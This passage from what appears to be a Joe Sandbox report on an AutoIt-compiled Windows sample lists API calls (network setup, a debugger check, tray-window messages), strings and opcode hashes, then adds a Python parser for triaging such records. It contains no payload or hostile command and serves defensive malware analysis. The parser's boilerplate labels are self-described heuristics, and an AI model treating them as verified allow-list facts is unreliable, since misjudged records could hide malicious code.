• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005469B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: e8485ad3c276ae3046b111dc527960285d6885f21f51f6939a097d79c8a557a5
• Instruction ID: 6e1f8f31a2c1fdafc3b6a9cf2f45dcc217ed0b123af73f922f594070b0bcaae5
• Opcode Fuzzy Hash: e8485ad3c276ae3046b111dc527960285d6885f21f51f6939a097d79c8a557a5
• Instruction Fuzzy Hash: EA116A71100208ABEB108E689C44BEB3BA9FB163BCF504728F9A5971E0C6B5DC94A761
APIs
• _memset.LIBCMT ref: 00522A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00522A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 2db0eb8e1358497261a860f5b1dd7b0ae8e513afdb7f7437cb56dc5fc70ff66d
• Instruction ID: 31a21e3a2ffbee2aff4a58e5dbf9f22efb762d061952b76b713cf3d9274bd154
• Opcode Fuzzy Hash: 2db0eb8e1358497261a860f5b1dd7b0ae8e513afdb7f7437cb56dc5fc70ff66d
• Instruction Fuzzy Hash: 4B11D33AD01124BBCB35DA58EC44BEA7BA8BF47304F144025E855EB2D0D7B0AE0AC791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0053222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00532255
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: a6935dc88f29e8224de8480a66c4ed1b62912e7fbf31412e06cc0320563e4d8e
• Instruction ID: e6ffd791f0df0063d6a27c6194132fd3cd722001e0e2b8a746ad0e4aee5dbc46
• Opcode Fuzzy Hash: a6935dc88f29e8224de8480a66c4ed1b62912e7fbf31412e06cc0320563e4d8e
• Instruction Fuzzy Hash: AB112178541A25BADB258F519C88EFBFFACFF16751F10862AFA0586000D3706884DAF0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004C3C14,005852F8,?,?,?), ref: 004D096E
  • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
• _wcscat.LIBCMT ref: 00504CB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID: SX
• API String ID: 257928180-269960141
• Opcode ID: a51d5dc928ad802d84a78dd3328166084ac36574d28278b598fd9c33fbbfdabd
• Instruction ID: 2e2e4828d4de768ae45811539a48cc7a065eec4c8d96af1251cb1d42131ada09
• Opcode Fuzzy Hash: a51d5dc928ad802d84a78dd3328166084ac36574d28278b598fd9c33fbbfdabd
• Instruction Fuzzy Hash: 601186749052089BCB40FF658C15FDD77E8FF08348F0044ABB954D3285EAB4AA844B19
APIs
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00518E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: f143c1bc0071b484bf1745aa68aa4633cf6d2cd135977b174d4fcd0b94373160
• Instruction ID: afd55b9e606be14516a87786197be79c044d9c84678793cb9daa3c7add17c973
• Opcode Fuzzy Hash: f143c1bc0071b484bf1745aa68aa4633cf6d2cd135977b174d4fcd0b94373160
• Instruction Fuzzy Hash: 640145B5601219AB9B14EBA0CC45DFE3B68BF46320F000A1EB836572D1DE351848D650
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: a8b374f7d9f661327d49100f7e8854f598b36e2aff5a668abf4ada860a77dbae
• Instruction ID: a9c5a213a75a5ad724d3570c63f6a5fc1f40a9a983babc7cd8b88730956021a3
• Opcode Fuzzy Hash: a8b374f7d9f661327d49100f7e8854f598b36e2aff5a668abf4ada860a77dbae
• Instruction Fuzzy Hash: 8701F9729042587EDB18CAA9D816EFE7BF8DF11315F00459FF556D21C1E878A6088760
APIs
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00518D6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: f2f74b5f33c319890d9dd8ab07ceaa5f53d045ac70eaedb6c20bec7e7eb5bdbf
• Instruction ID: 436d494b19d884974f34c6ddbe9ee6a46e745b7a1a141631e0734d1326cb3d6a
• Opcode Fuzzy Hash: f2f74b5f33c319890d9dd8ab07ceaa5f53d045ac70eaedb6c20bec7e7eb5bdbf
• Instruction Fuzzy Hash: 5F01FCB5641109ABDB25E7E1D956FFE7BA8EF15340F10001E7806631D1DE245E48D671
APIs
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
  • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00518DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: b4e2b00b1aaf444a75ac1ab2d3b62922d43b3332b483501b6e671f0ad7e053d9
• Instruction ID: d468df8adddf9ad0545be25fc18a5d71e372d7489443324e0c3eeac22792d18d
• Opcode Fuzzy Hash: b4e2b00b1aaf444a75ac1ab2d3b62922d43b3332b483501b6e671f0ad7e053d9
• Instruction Fuzzy Hash: ED0170B560110977DB21E7A4D941FFE7B5CEF15340F10001EB805731D1DD244E48D271
APIs
• VariantInit.OLEAUT32(?), ref: 0051C534
  • Part of subcall function 0051C816: _memmove.LIBCMT ref: 0051C860
  • Part of subcall function 0051C816: VariantInit.OLEAUT32(00000000), ref: 0051C882
  • Part of subcall function 0051C816: VariantCopy.OLEAUT32(00000000,?), ref: 0051C88C
• VariantClear.OLEAUT32(?), ref: 0051C556
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}W
• API String ID: 2932060187-3741415682
• Opcode ID: 52f025bf2b679b61426fb9c83c0f5087d7caedc38a044799c0404d28439d6b7c
• Instruction ID: 946abc3ba9b6eb2066da3066da4e79cb6a5799f1f637acd34f084a89bbc83255
• Opcode Fuzzy Hash: 52f025bf2b679b61426fb9c83c0f5087d7caedc38a044799c0404d28439d6b7c
                                                                                                                      • Instruction Fuzzy Hash: CA1100B19007089FC720DFAAD8849DAFBF8FF18314B50856FE58AD7611E771AA48CB54
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: b97be7efd742900c622cf54f699466ce503a8fbda023732677c10d031faac4f2
• Instruction ID: 35f16a174f5f38af5723b935cf4f28133a0b1ca5d4c53d9ade449d9e0e091d01
• Opcode Fuzzy Hash: b97be7efd742900c622cf54f699466ce503a8fbda023732677c10d031faac4f2
• Instruction Fuzzy Hash: 08E0D13250023877D7109B59EC49FA7FBACEB55B71F000057FD04D3151D5649A458BE0
APIs
  • Part of subcall function 004FB314: _memset.LIBCMT ref: 004FB321
  • Part of subcall function 004E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004FB2F0,?,?,?,004C100A), ref: 004E0945
• IsDebuggerPresent.KERNEL32(?,?,?,004C100A), ref: 004FB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004C100A), ref: 004FB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004FB2FE
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 11ed2c17a5f825bef706a921bbb8ff25538a1850a73b36231fb959d5db5ef72f
• Instruction ID: d509e87b0af0435622b3a0eb89d8c2cb10e7505b1daff2819bdfa100b4a46d4a
• Opcode Fuzzy Hash: 11ed2c17a5f825bef706a921bbb8ff25538a1850a73b36231fb959d5db5ef72f
• Instruction Fuzzy Hash: 13E06D78600B008BD7209F2AE8047527AE8FF1135CF01893EE856C7341EBB9D848CBA1
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00517C82
  • Part of subcall function 004E3358: _doexit.LIBCMT ref: 004E3362
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: b7601ddbfd1efbd6e34c84579acc2e3f9c601d8e73f248f1279e904dd06611f3
• Instruction ID: 29175d56634e8aaba71852ea4a7a55f8665c9eb6a1f3806670759cef08bfcf06
• Opcode Fuzzy Hash: b7601ddbfd1efbd6e34c84579acc2e3f9c601d8e73f248f1279e904dd06611f3
• Instruction Fuzzy Hash: F0D0C2323C435832D10532AB7C0BFCA2D488B05B5BF00042BBF08594D389D6488052EC
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00501775
  • Part of subcall function 0053BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0050195E,?), ref: 0053BFFE
  • Part of subcall function 0053BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0053C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0050196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: c8645c9bcdfc0e6fe374ea599559283a1a1c106a85962833df45d920a1687208
• Instruction ID: b820bcddfd4270a2b63817636ac68321744eda74e3321f69ab740c636ae85397
• Opcode Fuzzy Hash: c8645c9bcdfc0e6fe374ea599559283a1a1c106a85962833df45d920a1687208
• Instruction Fuzzy Hash: 42F0C970800109DFDB15DB95CA88AECBBF8FB18305F541495E102A61A0D7759F89DF66
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0054596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00545981
  • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 7cee453d752d368a0dbf3dc3a1ab733f37ec0a54e0244d5dce24e89e5d4a52de
• Instruction ID: 685e8e7e122e3bca82893382fc256e5b4475fe2cff448fd5f2064a548690178e
• Opcode Fuzzy Hash: 7cee453d752d368a0dbf3dc3a1ab733f37ec0a54e0244d5dce24e89e5d4a52de
• Instruction Fuzzy Hash: EED0C939794311B7E664AB74AC0FFE66A14BF51B54F010825B249AA1D0E9E0A804D754
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005459AE
• PostMessageW.USER32(00000000), ref: 005459B5
  • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: f51dc0dd3564371b601ef1cba30eb365abd6fcfd4569e52536aea33ccb4cf273
• Instruction ID: 4e057cf4017ee484e94bf992c7b7bcb8362d44d5de3bc327fb77bc2b7a1aeb15
• Opcode Fuzzy Hash: f51dc0dd3564371b601ef1cba30eb365abd6fcfd4569e52536aea33ccb4cf273
• Instruction Fuzzy Hash: C3D0C9357C0311BBE664AB74AC0FFD66A14BB56B54F010825B249AA1D0E9E0A804D754
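The function records above follow a fixed layout, and the per-function Opcode IDs and String IDs are what an analyst copies out of the report to separate the AutoIt interpreter's own runtime code from the compiled script's logic, or to intersect two samples' function sets. As an added example, not part of the Joe Sandbox report or its tooling, the following Python parses such records as pasted from the page, tolerating the indentation and the "Download File" link text fused onto the dump names, and labels two of them with a boilerplate table that is this example's own assumption: the IsDebuggerPresent/OutputDebugStringW pair with the CAtlBaseModule string is ATL's CAtlBaseModule constructor, which writes that message only when a debugger is attached, so on its own it is library initialization rather than evasion logic (it is still enough to trip the generic "checks if a debugger is running" signature), and the MessageBoxW titled "AutoIt" with "Error allocating memory." is the AutoIt runtime's allocation-failure handler. The sample input is three records copied from this report, with one "Download File" suffix left in deliberately.

```python
"""Parse Joe Sandbox per-function records and label known runtime boilerplate.

Added example, not Joe Sandbox code. The BOILERPLATE table is this example's
own heuristic; extend it from your own corpus of known-benign runtime stubs.
"""
import re
from dataclasses import dataclass, field

BULLET = "\u2022"
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# One API call per bullet; subcall bullets also name the callee that makes the call.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")

# Heuristic (assumed) mapping from a substring of the record's String ID to a label.
BOILERPLATE = {
    "Unable to initialize critical section in CAtlBaseModule": "atl_runtime",
    "Error allocating memory.": "autoit_runtime",
}

# Constructed input: three records copied from the report, indented as a browser
# copy produces them; the "Download File" suffix on one Associated line is kept on purpose.
SAMPLE = """
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,004C100A), ref: 004FB2F4
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004C100A), ref: 004FB303
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004FB2FE
    Similarity
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • Opcode ID: 11ed2c17a5f825bef706a921bbb8ff25538a1850a73b36231fb959d5db5ef72f
    APIs
    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00517C82
      • Part of subcall function 004E3358: _doexit.LIBCMT ref: 004E3362
    Strings
    Similarity
    • API ID: Message_doexit
    • String ID: AutoIt$Error allocating memory.
    • Opcode ID: b7601ddbfd1efbd6e34c84579acc2e3f9c601d8e73f248f1279e904dd06611f3
    APIs
    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0054596E
    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00545981
    Memory Dump Source
    • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
    • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
    Similarity
    • String ID: Shell_TrayWnd
    • Opcode ID: 7cee453d752d368a0dbf3dc3a1ab733f37ec0a54e0244d5dce24e89e5d4a52de
"""


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (name, module, args, ref, subfn-or-None)
    strings: list = field(default_factory=list)   # (text, xref)
    fields: dict = field(default_factory=dict)    # Similarity / dump-source key-value pairs

    def api_names(self):
        return {name for name, _, _, _, _ in self.apis}

    def opcode_id(self):
        return self.fields.get("Opcode ID")


def _clean(line):
    """Drop export indentation and the 'Download File' widget text fused to dump names."""
    text = line.strip()
    if text.endswith("Download File"):
        text = text[: -len("Download File")].rstrip()
    return text


def parse_records(text):
    """Each 'APIs' heading opens a new record; bullets are routed by the current section."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith(BULLET):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current.apis.append((m["name"], m["module"], m["args"] or "", m["ref"], m["subfn"]))
        elif section == "Strings":
            text_part, sep, xref = body.rpartition(", xrefs: ")
            current.strings.append((text_part, xref) if sep else (body, ""))
        else:
            m = KV_RE.match(body)
            if m:
                current.fields[m["key"].strip()] = m["value"].strip()
    return records


def classify(record):
    """Label a record from the boilerplate table, or 'unclassified' when nothing matches."""
    string_id = record.fields.get("String ID", "")
    for needle, label in BOILERPLATE.items():
        if needle in string_id:
            return label
    return "unclassified"


def index_by_opcode(records):
    """Opcode ID -> record, so two reports can be intersected on identical function bodies."""
    return {r.opcode_id(): r for r in records if r.opcode_id()}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(classify(rec), sorted(rec.api_names()), rec.opcode_id())
```

Run against a whole exported report, the unclassified set is the part worth reading; the labelled records are interpreter and library code that appear in every AutoIt-compiled binary, and an Opcode ID that recurs across unrelated samples with the same label is a safe candidate for an allow-list.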